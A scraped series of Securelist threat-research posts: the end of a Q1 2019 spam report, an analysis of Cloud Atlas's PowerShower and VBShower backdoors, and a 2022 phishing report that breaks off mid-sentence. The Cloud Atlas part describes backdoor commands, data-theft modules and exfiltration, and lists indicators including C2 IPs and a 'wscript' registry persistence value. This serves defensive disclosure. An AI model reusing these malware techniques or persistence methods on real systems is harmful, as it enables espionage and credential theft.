Apple sites before the presentation _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143724/apple-en.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142839/Spam-report-Q1-2019-4.png>)\n\n_Fake Apple ID login pages_\n\nScammers polluted Internet traffic with phishing emails seemingly from Apple to try to fool recipients into following a link and entering their login credentials on a fake Apple ID login page.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143511/Spam-report-Q1-2019-5.png>)\n\n### Fake technical support\n\nFake customer support emails are one of the most popular types of online fraud. The number of such messages has grown quite significantly of late. Links to fake technical support sites (accompanied by rave reviews) can be seen both on dedicated forums and social networks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142930/Spam-report-Q1-2019-6.png>)\n\n_Fake \"Kaspersky Lab support service\" accounts_\n\nAll these profiles that we detected in Q1 have one thing in common: they offer assistance in matters related to one or another company products, with the promise of specially trained, highly qualified staff supposedly ready and waiting to help. Needless to say, it is not free. Not only do users not have their issue resolved, they are likely to be defrauded as well.\n\n### New Instagram \"features\"\n\nLast year, we [wrote](<https://securelist.com/spam-and-phishing-in-q2-2018/87368/>) that phishers and other scammers had moved beyond mailing lists and into the realm of the popular social network Instagram. This trend continued, with fraudsters exploiting the service to the full \u2014 not only leaving links to phishing resources in comments, but also registering accounts, paying for advertising posts, and even enticing celebrities to distribute content.\n\nCybercriminal advertisers use the same methods to lure victims by promising products or services at what seems a great price.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143002/Spam-report-Q1-2019-7.png>)\n\nAs usual in such schemes, the \"buyer\" is asked for all sorts of information, from name to bank details. It goes without saying that all the user gets is their private data compromised.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143034/Spam-report-Q1-2019-8.png>)\n\n### Mailshot phishing\n\nIn Q1, we registered several phishing mailings in the form of automatic notifications seemingly on behalf of major services in charge of managing legitimate mailing lists. Scammers tried to force recipients to follow the phishing links under the pretext of verifying an account or updating payment information. Sometimes fake domains were used with names similar to real services, while other times hacked sites redirected the victim to a fake authorization form.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143105/Spam-report-Q1-2019-9.png>)\n\n### Financial spam through the ACH system\n\nIn Q1, we observed a large surge in spam mailings aimed at users of the Automated Clearing House (ACH), a US-based e-payment system that processes vast quantities of consumer and small-business transactions. These mailings consisted of fake notifications about the status of transfers supposedly made by ordinary users or firms. Such messages contained both malicious attachments (archives, documents) and links to download files infected with malware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143129/Spam-report-Q1-2019-10.png>)\n\n### \"Dream job\" offers from spammers \n\nIn Q3, we [registered spam messages](<https://securelist.com/spam-and-phishing-in-q3-2018/88686/>) containing \"dream job\" offers. This quarter, we logged another major mailing topic: messages were sent supposedly on behalf of well-known companies sure to attract lots of potential applicants. Recipients were invited to register in the job search system for free by installing a special app on their computer to access the database. When trying to download the program from the \"cloud service,\" the user was shown a pop-up window titled DDoS Protection and a message with a link pointing to the site of an online recruitment company (the names of several popular recruitment agencies were used in the mailing). If the user followed it, a malicious DOC file containing Trojan.MSOffice.SAgent.gen was downloaded to their computer, which in turn downloaded Trojan-Banker.Win32.Gozi.bqr onto the victim's machine.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143159/Spam-report-Q1-2019-11.png>)\n\n### Ransomware and cryptocurrency\n\nAs we expected, cybercriminal interest in cryptocurrency did not wane. Spammers continue to wring cryptocurrency payments out of users by means of \"sextortion\" \u2014 a topic we [wrote about last year](<https://securelist.com/spam-and-phishing-in-2018/93453/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143235/Spam-report-Q1-2019-12.png>)\n\nIn Q1 2019, we uncovered a rather unusual scam mailing scheme whereby cybercriminals sent messages in the name of a CIA employee allegedly with access to a case file on the recipient for possession and distribution of digital pornographic materials involving minors.\n\nThe fictitious employee, whose name varied from message to message, claimed to have found the victim's details in the case file (which were actually harvested from social networks/online chats/forums, etc.). It was said to be part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the \"employee\" happened to know that the victim was a well-off individual with a reputation to protect \u2014 for which a payment of 10,000 dollars in bitcoin was demanded.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143314/Spam-report-Q1-2019-13.png>)\n\nPlaying on people's fear of private data being disclosed, the scammers employed the same tricks as last year, mentioning access to personal data, compromising pornographic materials, etc. But this time, to make the message more convincing and intimidating, a CIA officer was used as a bogeyman.\n\n### Malicious attacks on the corporate sector\n\nIn Q1, the [corporate sector of the Runet was hit by a malicious spam attack](<https://www.kaspersky.ru/blog/phishing-wave-shade/22251/>). The content imitated real business correspondence, and the messages themselves were seemingly from partners of the victim company.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143345/Spam-report-Q1-2019-14.png>)\n\nWe also observed malicious mailings aimed at stealing the financial information of international companies through distributing fake messages in the name of a US company allegedly providing information services. Besides the attachment, there was nothing at all in the message. The lack of text was seemingly intended to prompt the victim to open the attached document containing Trojan.MSOffice.Alien.gen, which then downloaded and installed Trojan-Banker.Win32.Trickster.gen on the computer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143418/Spam-report-Q1-2019-15.png>)\n\n### Attacks on the banking sector\n\nBanks are firmly established as top phishing targets. Scammers try to make their fake messages as believable as possible by substituting legitimate domains into the sender's address, copying the layout of official emails, devising plausible pretexts, etc. In Q1, phishers exploited high-profile events to persuade victims of the legitimacy of the received message \u2014 for example, they inserted into the message body a phrase about the Christchurch terror attack. The attackers hoped that this, plus the name of a New Zealand bank as the sender, would add credibility to the message. The email itself stated that the bank had introduced some new security features that required an update of the account details to use.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143441/Spam-report-Q1-2019-16.png>)\n\nThe link took the user to a phishing site mimicking the login page of the New Zealand bank in question. All data entered on the site was transferred to the cybercriminals when the Login button was clicked/tapped.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143603/Spam-report-Q1-2019-17.png>)\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Proportion of spam in global mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14144003/spam-world-en.png>)\n\nIn Q1 2019, the highest percentage of spam was recorded in March at 56.33%. The average percentage of spam in global mail traffic came to 55.97%, which is almost identical (+0.07 p.p.) to Q4 2018.\n\n_Proportion of spam in Runet mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143939/spam-russia-en.png>)\n\nPeak spam in traffic in the Russian segment of the Internet came in January (56.19%). The average value for the quarter was 55.48%, which is 2.01 p.p. higher than in Q4.\n\n### Sources of spam by country\n\n_Sources of spam by country, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143819/countries-source-en.png>)\n\nAs is customary, the top spam-originating countries were China (15.82%) and the US (12.64%); the other Top 3 regular, Germany, was down to fifth place in Q1 (5.86%), ceding third place to Russia (6.98%) and allowing Brazil (6.95%) to sneak into fourth. In sixth place came France (4.26%), followed by Argentina (3.42%), Poland (3.36%), and India (2.58%). The Top 10 is rounded off by Vietnam (2.18%).\n\n### Spam email size\n\n_Spam email size, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143628/spam-size.png>)\n\nIn Q1 2019, the share of very small emails (up to 2 KB) in spam increased against Q4 2018 by 7.14 p.p. to 73.98%. The share of 2\u20135 KB messages fell to 8.27% (down 3.15 p.p.). 10\u201320 KB messages made up 5.11% of spam traffic, up 1.08 p.p. on Q4. The share of messages sized 20\u201350 KB amounted to 3.00% (0.32 p.p. growth against Q4 2018).\n\n### Malicious attachments: malware families\n\n_TOP 10 malicious families in mail traffic, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143654/families.png>)\n\nIn Q1 2019, the most common malware in mail traffic turned out to be Exploit.MSOffice.CVE-2017-11882, with a share of 7.73%. In second place was Backdoor.Win32.Androm (7.62%), and Worm.Win32.WBVB (4.80%) took third. Fourth position went to another exploit for Microsoft Office in the shape of Exploit.MSOffice.CVE-2018-0802 (2.81%), while Trojan-Spy.Win32.Noon (2.42%) rounded off the Top 5.\n\n### Countries targeted by malicious mailshots\n\n_Countries targeted by malicious mailshots, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143848/countries-victims-en.png>)\n\nFirst place in the Top 3 countries by number of Mail Anti-Virus triggers yet again went to Germany (11.88%). It is followed by Vietnam (6.24%) in second position and Russia (5.70%) in third.\n\n## Statistics: phishing\n\nIn Q1 2019, the Anti-Phishing system prevented **111,832,308** attempts to direct users to scam websites. **12.11%** of all Kaspersky Lab users worldwide experienced an attack.\n\n### Attack geography\n\nIn Q1 2019, as in the previous quarter, the country with the largest share of users attacked by phishers was Brazil with 21.66%, up 1.53 p.p.\n\n_Geography of phishing attacks, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143915/map-en.png>)\n\nIn second place up from eighth was Australia (17.20%), adding 2.42 p.p. but still 4.46 p.p. behind top-place Brazil. Spain rose one position to 16.96% (+0.87 p.p.), just above Portugal (16.86%) and Venezuela (16.72%) propping up the Top 5.\n\n**Country** | **%*** \n---|--- \nBrazil | 21.66 \nAustralia | 17.20 \nSpain | 16.96 \nPortugal | 16.81 \nVenezuela | 16.72 \nGreece | 15.86 \nAlbania | 15.11 \nEcuador | 14.99 \nRwanda | 14.89 \nGeorgia | 14.76 \n \n*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab's Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nThis quarter, the banking sector remains in first place by number of attacks \u2014 the share of attacks on credit organizations increased by 5.23 p.p. against Q4 last year to 25.78%.\n\n_Distribution of organizations subjected to phishing attacks by category, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/20091310/companies-en-1.png>)\n\nSecond place went to global Internet portals (19.82%), and payment systems \u2014 another category that includes financial institutions \u2014 finished third (17.33%).\n\n## Conclusion\n\nIn Q1 2019, the average share of spam in global mail traffic rose by **0.06** p.p. to **55.97**%, and the Anti-Phishing system prevented more than **111,832,308** redirects to phishing sites, up **35,220,650** in comparison with the previous reporting period.\n\nAs previously, scammers wasted no opportunity to exploit high-profile media events for their own purposes (Apple product launch, New Zealand terror attack). Sextortion has not gone away \u2014 on the contrary, to make such schemes more believable, cybercriminals have come up with new cover stories about the message senders.\n\nOn top of all that, attackers continue to use social networks to achieve their goals, and have launched advertising campaigns using celebrities to extend their reach.", "cvss3": {}, "published": "2019-05-15T10:00:23", "type": "securelist", "title": "Spam and phishing in Q1 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-05-15T10:00:23", "id": "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "href": "https://securelist.com/spam-and-phishing-in-q1-2019/90795/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-12T19:33:22", "description": "\n\nAlso known as Inception, Cloud Atlas is an actor that has a long history of cyber-espionage operations targeting industries and governmental entities. We first reported [Cloud Atlas in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and we've been following its activities ever since.\n\nFrom the beginning of 2019 until July, we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/09151317/Recent-Cloud-Atlas-activity-1.png>)\n\n**Countries targeted by Cloud Atlas recently**\n\nCloud Atlas hasn't changed its TTPs (Tactic Tools and Procedures) since 2018 and is still relying on its effective existing tactics and malware in order to compromise high value targets.\n\nThe Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims. These emails are crafted with Office documents that use malicious remote templates - whitelisted per victims - hosted on remote servers. We [described one of the techniques used by Cloud Atlas in 2017](<https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899/>) and our colleagues at [Palo Alto Networks also wrote about it in November 2018](<https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/>).\n\nPreviously, Cloud Atlas dropped its \"validator\" implant named \"PowerShower\" directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. During recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed [five years ago in our first blogpost about them](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and which remains unchanged.\n\n## Let's meet PowerShower\n\nPowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences in the two versions reside mostly in anti-forensics features for the validator version of PowerShower.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084702/20190808_Infographics_Cloud_Atlas_Schema_2-5.png>)\n\nThe PowerShower backdoor - even in its later developments - takes three commands:\n\n**Command** | **Description** \n---|--- \n0x80 (Ascii \"P\") | It is the first byte of the magic PK. The implant will save the received content as a ZIP archive under %TEMP%\\PG.zip. \n0x79 (Ascii \"O\") | It is the first byte of \"On resume error\". The implant saves the received content as a VBS script under \"%APPDATA%\\Microsoft\\Word\\\\[A-Za-z]{4}.vbs\" and executes it by using Wscript.exe \nDefault | If the first byte doesn't match 0x80 or 0x79, the content is saved as an XML file under \"%TEMP%\\temp.xml\". After that, the script loads the content of the file, parses the XML to get the PowerShell commands to execute, decodes them from Base64 and invokes IEX. \nAfter executing the commands, the script deletes \"%TEMP%\\temp.xml\" and sends the content of \"%TEMP%\\pass.txt\" to the C2 via an HTTP POST request. \n \nA few modules deployed by PowerShower have been seen in the wild, such as:\n\n * A PowerShell document stealer module which uses 7zip (present in the received PG.zip) to pack and exfiltrate *.txt, *.pdf, *.xls or *.doc documents smaller than 5MB modified during the last two days;\n * A reconnaissance module which retrieves a list of the active processes, the current user and the current Windows domain. Interestingly, this feature is present in PowerShower but the condition leading to the execution of that feature is never met in the recent versions of PowerShower;\n * A password stealer module which uses the opensource tool LaZagne to retrieve passwords from the infected system.\n\nWe haven't yet seen a VBS module dropped by this implant, but we think that one of the VBS scripts dropped by PowerShower is a dropper of the group's second stage backdoor documented in our [article back in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## And his new friend, VBShower\n\nDuring its recent campaigns, Cloud Atlas used a new \"polymorphic\" infection chain relying no more on PowerShower directly after infection, but executing a polymorphic HTA hosted on a remote server, which is used to drop three different files on the local system.\n\n * A backdoor that we name **VBShower** which is polymorphic and replaces PowerShower as a validator;\n * A tiny launcher for VBShower ;\n * A file computed by the HTA which contains contextual data such as the current user, domain, computer name and a list of active processes.\n\nThis \"polymorphic\" infection chain allows the attacker to try to prevent IoC-based defence, as each code is unique by victim so it can't be searched via file hash on the host.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084643/20190808_Infographics_Cloud_Atlas_Schema_2.png>)\n\nThe VBShower backdoor has the same philosophy of the validator version of PowerShower. Its aim is to complicate forensic analysis by trying to delete all the files contained in \"%APPDATA%\\\\..\\Local\\Temporary Internet Files\\Content.Word\" and \"%APPDATA%\\\\..\\Local Settings\\Temporary Internet Files\\Content.Word\\\".\n\nOnce these files have been deleted and its persistence is achieved in the registry, VBShower sends the context file computed by the HTA to the remote server and tries to get via HTTP a VBS script to execute from the remote server every hour.\n\nAt the time of writing, two VBS files have been seen pushed to the target computer by VBShower. The first one is an installer for PowerShower and the second one is an installer for the Cloud Atlas second stage modular backdoor which communicates to a cloud storage service via Webdav.\n\n## Final words\n\nCloud Atlas remains very prolific in Eastern Europe and Central Asia. The actor's massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets.\n\nUnlike many other intrusion sets, Cloud Atlas hasn't chosen to use open source implants during its recent campaigns, in order to be less discriminating. More interestingly, this intrusion set hasn't changed its modular backdoor, even [five years after its discovery](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## IoCs\n\n#### Some emails used by the attackers\n\n * infocentre.gov@mail.ru\n * middleeasteye@asia.com\n * simbf2019@mail.ru\n * world_overview@politician.com\n * infocentre.gov@bk.ru\n\n#### VBShower registry persistence\n\n * Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8}\n * Value : wscript //B \"%APPDATA%\\\\[A-Za-z]{5}.vbs\"\n\n#### VBShower paths\n\n * %APPDATA%\\\\[A-Za-z]{5}.vbs.dat\n * %APPDATA%\\\\[A-Za-z]{5}.vbs\n * %APPDATA%\\\\[A-Za-z]{5}.mds\n\n#### VBShower C2s\n\n * 176.31.59.232\n * 144.217.174.57", "cvss3": {}, "published": "2019-08-12T10:00:58", "type": "securelist", "title": "Recent Cloud Atlas activity", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-08-12T10:00:58", "id": "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "href": "https://securelist.com/recent-cloud-atlas-activity/92016/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-16T08:14:22", "description": "\n\n## Figures of the year\n\nIn 2022:\n\n * 48.63% of all emails around the world and 52.78% of all emails in the Russian segment of the internet were spam\n * As much as 29.82% of all spam emails originated in Russia\n * Kaspersky Mail Anti-Virus blocked 166,187,118 malicious email attachments\n * Our Anti-Phishing system thwarted 507,851,735 attempts to follow phishing links\n * 378,496 attempts to follow phishing links were associated with Telegram account hijacking\n\n## Phishing in 2022\n\n### Last year's resonant global events\n\nThe year 2022 saw cybercrooks try to profit from new film releases and premieres just as they always have. The bait included the most awaited and talked-about releases: the new season of Stranger Things, the new Batman movie, and the Oscar nominees. Short-lived phishing sites often offered to see the premieres before the eagerly awaited movie or television show was scheduled to hit the screen. Those who just could not wait were in for a disappointment and a waste of cash. The promises of completely free access to the new content were never true. By clicking what appeared to be a link to the movie, the visitor got to view the official trailer or a film studio logo. Several seconds into the "preview", the stream was interrupted by an offer to buy an inexpensive subscription right there on the website to continue watching. If the movie lover entered their bank card details on the fake site, they risked paying more than the displayed amount for content that did not exist and sharing their card details with the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132238/spam-phishing-report-2022-01.png>)\n\nSome websites that offered soccer fans free broadcasts of the FIFA World Cup in Qatar employed a similar scheme, but the variety of hoaxes aimed at soccer fans proved to be wider than that used by scammers who attacked film lovers. Thus, during the World Cup a brand-new scam appeared: it offered users to win a newly released iPhone 14 for predicting match outcomes. After answering every question, the victim was told that they were almost there, but there was a small commission to be paid before they could get their gadget. Of course, no prize ensued after the fee was paid.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132326/spam-phishing-report-2022-02.jpg>)\n\nSoccer fans chasing merchandise risked compromising their bank cards or just losing some money. Scammers created websites that offered souvenirs at low prices, including rare items that were out of stock in legitimate online stores. Those who chose to spend their money on a shady website risked never getting what they ordered.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132414/spam-phishing-report-2022-03.jpg>)\n\nWebsites that offered tickets to the finals were another type of soccer-flavored bait. Scammers were betting on the finals typically being the most popular stage of the competition, tickets to which are often hard to get. Unlike legitimate ticket stores, the fake resellers were showing available seats in every sector even when the World Cup was almost closed. Vast selection of available seats should have alarmed visitors: real tickets would have been largely gone.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132716/spam-phishing-report-2022-04.png>)\n\nFake donation sites started popping up after the Ukraine crisis broke out in 2022, pretending to accept money as aid to Ukraine. These sites referenced public figures and humanitarian groups, offering to accept cash in cryptocurrency, something that should have raised a red flag in itself.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132903/spam-phishing-report-2022-05.png>)\n\n### The pandemic\n\nThe COVID-19 theme had lost relevance by late 2022 as the pandemic restrictions had been lifted in most countries. At the beginning of that year, we still observed phishing attacks that used the themes of infection and prevention as the bait. For example, one website offered users to obtain a COVID vaccination certificate by entering their British National Health Service (NHS) account credentials. Others offered the coveted Green Pass without vaccination.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141812/spam-phishing-report-2022-06.png>)\n\nScammers abused legitimate survey services by creating polls in the name of various organization to profit from victims' personal, including sensitive, data. In another COVID-themed scheme, the con artists introduced themselves as the Direct Relief charity, which helps to improve the quality of life and healthcare in poorer regions. Visitors were offered to fill out a form to be eligible for $750 per week in aid for twenty-six weeks. The survey page said the "charity" found the victim's telephone number in a database of individuals affected by COVID-19. Those who wished to receive the "aid" were asked to state their full name, contact details, date of birth, social security and driver's license numbers, gender, and current employer, attaching a scanned copy of their driver's license. To lend an air of authenticity and to motivate the victim to enter valid information, the swindlers warned that the victim could be prosecuted for providing false information. The scheme likely aimed at identity theft: the illegal use of others' personal details for deriving profit. The cybercrooks might also use the data to contact their victims later, staging a more convincing swindle.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141841/spam-phishing-report-2022-07.png>)\n\n### Crypto phishing and crypto scams\n\nThe unabated popularity of cryptocurrency saw crypto scammers' interest in wallet owners' accounts growing, despite the fact that rates continued to drop throughout the year. Cybercriminals chased seed phrases, used for recovering access to virtual funds. By getting the user's secret phrase, cybercriminals could get access to their cryptocurrency balance.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141926/spam-phishing-report-2022-08.png>)\n\nIn a typical internet hoax manner, crypto scam sites offered visitors to get rich quick by paying a small fee. Unlike common easy-money scams, these websites asked for payments in cryptocurrency \u2014 which they promised to give away and which they were trying to steal. The "giveaways" were timed to coincide with events that were directly or indirectly associated with cryptocurrency. Thus, one of the fake sites promised prizes on the occasion of Nvidia thirty-year anniversary (the company is a major vendor of graphics processing units, which are sometimes used for crypto mining). Promotion of cryptocurrency use was another pretext for the "giveaways". Users were offered to deposit up to 100 cryptocurrency units for a promise to refund two times that amount, purportedly to speed up digital currency adoption. In reality, the scheme worked the way any other internet hoax would: the self-professed altruists went off the radar once they received the deposit.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142443/spam-phishing-report-2022-09.png>)\n\n### Compensation, bonus, and paid survey scams\n\nBonuses and compensations are hard to deny in times of crisis and instability, but it is worth keeping in mind that "financial assistance" is frequently promised by con artists to swindle you out of your money.\n\n"Promotional campaigns by major banks" were a popular bait in 2022. Visitors to a fraudulent web page were offered to receive a one-time payment or to take a service quality survey for a fee. Unlike the prizes offered in the aforementioned crypto schemes, these fees were smaller: an equivalent of $30\u201340. The cybercriminals used an array of techniques to lull victims' vigilance: company logos, assurances that the campaigns were legit, as well as detailed, lifelike descriptions of the offer. Similar "campaigns" were staged in the name of other types of organizations, for example, the Polish finance ministry.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142523/spam-phishing-report-2022-10.png>)\n\nAid as distributed by various governmental and nongovernmental organizations remained a popular fraud theme in 2022. For example, in Muslim countries, scammers promised to send charity packages, purportedly under a "Ramadan Relief" program that aimed at helping low-income families during the Ramadan fast. The fasting period typically sees higher prices for food and household products, whereas observers buy more than they normally do and may be faced with a shortage of money. Legitimate charities, such as [WF-AID](<https://wfaid.org/rrf/>), do operate Ramadan relief programs, and judging by the screenshot below, the fraudsters were pretending to represent that organization. An eye-catching picture of the organization's logo and huge boxes was accompanied by a list of foodstuffs included in the aid package, with positive "recipient feedback" posted below the message. The victim was asked to make sure that their name was on the list of recipients, so they could get a package. This required providing personal data on the website and sending a link to the scam site to instant messaging contacts\u2014nothing extraordinary for hoaxes like this. This way, the scammers both populate their databases and have victims spread links to their malicious resources for them. In addition to that, they might ask the victim to cover the "shipping costs".\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142600/spam-phishing-report-2022-11.png>)\n\nGrowing utility rates and an increase in the price of natural resources have prompted several governments to start discussing compensations for the population. Payout notices could arrive by mail, email, or as a text message. Cybercriminals attempted to take advantage of the situation by creating web pages that mimicked government websites, promising cash for covering utility payments or compensation of utility expenses. Visitors were occasionally asked to provide personal details under the pretext of checking that they were eligible, or simply to fill out a questionnaire. In Britain, con artists posing as a government authority promised to compensate electricity costs. The description of the one-time payout was copied from the official website of the authority, which did provide the type of compensation. After completing the questionnaire, the victim was asked to specify the electric utility whose services they were using and enter the details of the bank card linked to their account with the utility. The promise of \u00a3400 was supposed to make the victim drop their guard and share their personal information.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142636/spam-phishing-report-2022-12.png>)\n\nIn Singapore, scammers offered a refund of water supply costs, purportedly because of double billing. An energy or resource crisis was not used as a pretext in this particular case, but refunds were still offered in the name of the water supply authority.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142706/spam-phishing-report-2022-13.png>)\n\n### Fake online stores and large vendor phishing\n\nWe see fake websites that imitate large online stores and marketplaces year after year, and 2022 was no exception. Phishing attacks targeted both the customers of globally known retailers and regional players. An attack often started with the victim receiving a link to a certain product supposedly offered at an attractive price, by email, in an instant messaging app, or on a social network. Those who fell for the trick could lose access to their accounts, have their bank card details stolen, or waste the money they wanted to spend on the dirt-cheap item.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142737/spam-phishing-report-2022-14.png>)\n\n"Insides" about "private sales" were also used as a lure. Thus, a web page that copied the appearance of a Russian marketplace promised discounts of up to 90% on all items listed on it. The page design did look credible, with the only potential red flags being really low prices and the URL in the address bar not matching the official one.\n\nMany large vendors, notably in the home appliances segment, announced in early spring that they would be pulling out of Russia, which caused a spike in demand. This was reflected in the threat landscape, with fake online stores offering home appliances popping up all over the Russian segment of the internet (also called Runet). Large retailers being out of stock, combined with unbelievably low prices, made these offers especially appealing. The risk associated with making a purchase was to lose a substantial amount of money and never to receive what was ordered.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142817/spam-phishing-report-2022-15.jpg>)\n\n### Hijacking of social media accounts\n\nUsers of social media have increasingly focused on privacy lately. That said, curiosity is hard to contain: people want to check out who has been following them, but do so without the other party knowing. Cybercriminals who were after their account credentials offered victims to have their cake and eat it by using some new social media capability. A fake Facebook Messenger page promised to install an update that could change the user's appearance and voice during video calls, and track who has been viewing their profile, among other features. To get the "update", the victim was asked to enter their account credentials, which the scammers immediately took over.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142852/spam-phishing-report-2022-16.png>)\n\nMany Instagram users dream about the Blue Badge, which stands for verified account and is typically reserved for large companies or media personalities. Cybercriminals decided to take advantage of that exclusivity, creating phishing pages that assured visitors their verified status had been approved and all they needed to do was to enter their account logins and passwords.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142919/spam-phishing-report-2022-17.png>)\n\nRussia blocked access to both Facebook and Instagram in March 2022, which led to the popularity of Russian social networks and Telegram skyrocketing. This increased usage meant the users' risk of losing personal data was now higher, too. "Well-wishers" who operated scam sites offered to check if Russian social media contained any embarrassing materials on the victim. The scam operators told the users it was possible to find damaging information about every third user of a social network by running a search. If the user agreed to a search to be done for them, they were told that a certain amount of dirty linen indeed had been found. In reality, there was no search \u2014 the scammers simply stole the credentials they requested for the check.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142944/spam-phishing-report-2022-18.png>)\n\nOne of the added risks of social media phishing is scammers getting access to both the social media account itself and any linked services.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143155/spam-phishing-report-2022-19.png>)\n\nThe Telegram Premium status provides a range of benefits, from an ad-free experience to an ability to block incoming voice messages, but the subscription costs money. Scammers offered to "test" a Premium subscription free of charge or simply promised to give one for free if the victim entered their Telegram user name and password or a verification code sent by the service, which was exactly what the cybercrooks were after.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143228/spam-phishing-report-2022-20-EN.png>)\n\nOne more phishing campaign targeting Telegram users was arranged to coincide with the New Year's celebration. Scammers created a page on the telegra.ph blogging platform that posted a gallery of children's drawings, encouraging users to vote for their favorites. Scammers sent a link to that page from hacked accounts, asking users to vote for their friends' kids' works. Those who took the bait were directed to a fake page with a login form on it. The cybercriminals were betting on the users to go straight to voting, without checking the authenticity of the drawings, which had been copied from various past years' competition pages, as requests to vote for one's friends' kids are common before public 